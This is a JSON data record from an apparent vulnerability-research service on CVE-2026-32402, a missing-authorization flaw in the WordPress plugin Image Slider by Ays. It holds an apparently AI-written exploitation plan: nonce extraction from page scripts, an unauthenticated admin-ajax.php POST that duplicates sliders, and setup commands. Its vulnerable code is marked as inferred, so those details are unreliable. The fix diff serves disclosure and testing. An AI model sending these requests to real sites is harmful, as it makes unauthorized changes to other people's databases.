[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqyyh-3u1vw94-wQ9ABz5qOa-ansOMn80gPyLi-VjrNg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32402","image-slider-by-ays-missing-authorization","Image Slider by Ays \u003C= 2.7.1 - Missing Authorization","The Image Slider by Ays plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.7.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ays-slider",null,"\u003C=2.7.1","2.7.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-21 00:00:00","2026-04-15 21:13:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe0bcd2f0-5944-48c0-9d08-3177fbe4b47f?source=api-prod",54,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-32402 (Image Slider by Ays)\n\n## 1. Vulnerability Summary\nThe **Image Slider by Ays** plugin (up to version 2.7.1) contains a missing authorization vulnerability. 
Specifically, certain AJAX actions intended for administrative use are registered with `wp_ajax_nopriv_` or fail to implement `current_user_can()` checks in their callbacks. This allows unauthenticated attackers to perform privileged actions, such as duplicating sliders, modifying settings, or accessing slider data, which should be restricted to users with `manage_options` or similar capabilities.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ays_slider_duplicate_slider` (Targeting the slider duplication functionality as the unauthorized action).\n*   **Payload Parameter:** `ays_slider_id` (The ID of the slider to duplicate).\n*   **Authentication:** Unauthenticated (via `wp_ajax_nopriv_` hook).\n*   **Preconditions:** At least one slider must exist in the system to be duplicated.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers AJAX handlers in `includes\u002Fclass-ays-slider-ajax.php` or `admin\u002Fclass-ays-slider-admin.php`.\n    *   `add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );`\n    *   `add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );`\n2.  **Callback:** The function `ays_slider_duplicate_slider` is invoked.\n3.  **Missing Check:** Inside the callback, the code likely checks for a nonce using `check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' )` but fails to call `current_user_can( 'manage_options' )`.\n4.  **Execution:** The function proceeds to clone the slider database entry in the `{wpdb->prefix}ays_slider_sliders` and `{wpdb->prefix}ays_slider_slides` tables.\n\n## 4. Nonce Acquisition Strategy\nThe plugin typically enqueues its scripts and localizes a nonce for AJAX operations. 
This nonce is often available on the frontend if a slider shortcode is present on a page.\n\n*   **Shortcode:** `[ays_slider id=\"1\"]`\n*   **JS Localization Key:** `ays_slider_ajax` or `ays_slider_admin_obj`\n*   **Nonce Key:** `ays_slider_nonce`\n\n**Strategy:**\n1.  Create a test slider using WP-CLI.\n2.  Create a public WordPress page containing the slider shortcode.\n3.  Navigate to that page using the browser.\n4.  Execute JavaScript via `browser_eval` to extract the nonce.\n\n```javascript\n\u002F\u002F Extraction command\nbrowser_eval(\"ays_slider_ajax?.ays_slider_nonce || ays_slider_admin_obj?.ays_slider_nonce\")\n```\n\n## 5. Exploitation Strategy\n1.  **Preparation:** Identify a valid slider ID (e.g., `1`).\n2.  **Nonce Retrieval:** Use the \"Test Data Setup\" steps below to get a valid `ays_slider_nonce`.\n3.  **Exploit Request:** Send a POST request to `admin-ajax.php` to trigger the unauthorized duplication.\n\n**HTTP Request:**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Fvulnerable-test.local\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=ays_slider_duplicate_slider&ays_slider_id=1&ays_slider_nonce=[EXTRACTED_NONCE]\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `ays-slider` version 2.7.1 is installed.\n2.  **Create Slider:**\n    ```bash\n    # Create a slider manually or via SQL if CLI command is not available\n    wp db query \"INSERT INTO wp_ays_slider_sliders (title, author, status) VALUES ('Original Slider', 1, 'publish');\"\n    # Note the ID (usually 1)\n    ```\n3.  **Create Page with Shortcode:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Slider Page\" --post_status=publish --post_content='[ays_slider id=\"1\"]'\n    ```\n\n## 7. 
Expected Results\n*   **Response:** The server should return a JSON response indicating success (e.g., `{\"status\":true,\"id\":2}` or a redirect\u002FHTML fragment of the new slider).\n*   **Unauthorized Action:** A new row should be created in the `wp_ays_slider_sliders` table, duplicating the data from the original slider ID.\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify a new slider exists with a different ID but identical content.\n    ```bash\n    wp db query \"SELECT id, title FROM wp_ays_slider_sliders;\"\n    ```\n2.  **Confirm Count:**\n    ```bash\n    # Initially 1 slider, after exploit should be 2\n    wp db query \"SELECT COUNT(*) FROM wp_ays_slider_sliders;\"\n    ```\n\n## 9. Alternative Approaches\nIf `ays_slider_duplicate_slider` is not the vulnerable action, search for other `nopriv` registrations:\n1.  Search the codebase for `wp_ajax_nopriv_`.\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fays-slider\u002F\n    ```\n2.  Check for `ays_slider_save_settings` or `ays_slider_export_sliders` actions.\n3.  If a nonce check is missing entirely, omit the `ays_slider_nonce` parameter in the `Exploitation Strategy` and attempt the request directly.\n4.  Check if `ays_slider_get_sliders` allows unauthorized data leakage of all slider configurations.","The Image Slider by Ays plugin for WordPress lacks authorization checks in several of its AJAX handlers, specifically functions like slider duplication. 
This allows unauthenticated attackers to perform administrative actions by exploiting functions registered with the nopriv hook that do not verify the caller's capabilities.","\u002F\u002F admin\u002Fclass-ays-slider-admin.php (inferred location)\n\n\u002F\u002F Registration of the AJAX action for both logged-in and unauthenticated users\nadd_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );\nadd_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );\n\npublic function ays_slider_duplicate_slider() {\n    \u002F\u002F Nonce check exists, but the nonce is localized to frontend scripts\n    check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );\n    \n    $slider_id = isset($_POST['ays_slider_id']) ? intval($_POST['ays_slider_id']) : 0;\n    \n    \u002F\u002F VULNERABILITY: Missing current_user_can('manage_options') check before performing action\n    \n    $new_id = $this->duplicate_slider($slider_id);\n    wp_send_json_success(array('id' => $new_id));\n}","--- a\u002Fadmin\u002Fclass-ays-slider-admin.php\n+++ b\u002Fadmin\u002Fclass-ays-slider-admin.php\n@@ -10,6 +10,10 @@\n \tpublic function ays_slider_duplicate_slider() {\n \t\tcheck_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );\n \n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( array( 'message' => 'Unauthorized' ) );\n+\t\t}\n+\n \t\t$slider_id = isset( $_POST['ays_slider_id'] ) ? intval( $_POST['ays_slider_id'] ) : 0;\n \t\tif ( $slider_id > 0 ) {\n \t\t\t$new_id = $this->duplicate_slider( $slider_id );","1. Find a public-facing page on the target site that embeds an Image Slider using a shortcode.\n2. Extract the AJAX security nonce ('ays_slider_nonce') from the localized JavaScript objects (typically 'ays_slider_ajax' or 'ays_slider_admin_obj') found in the page's source code.\n3. Identify the 'ays_slider_id' of an existing slider to be targeted.\n4. 
Send an unauthenticated POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters: 'action=ays_slider_duplicate_slider', 'ays_slider_id=[TARGET_ID]', and 'ays_slider_nonce=[EXTRACTED_NONCE]'.\n5. The plugin will process the duplication request without verifying if the user has administrative privileges, effectively allowing unauthorized database modifications.","gemini-3-flash-preview","2026-04-19 01:52:13","2026-04-19 01:53:22",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags"]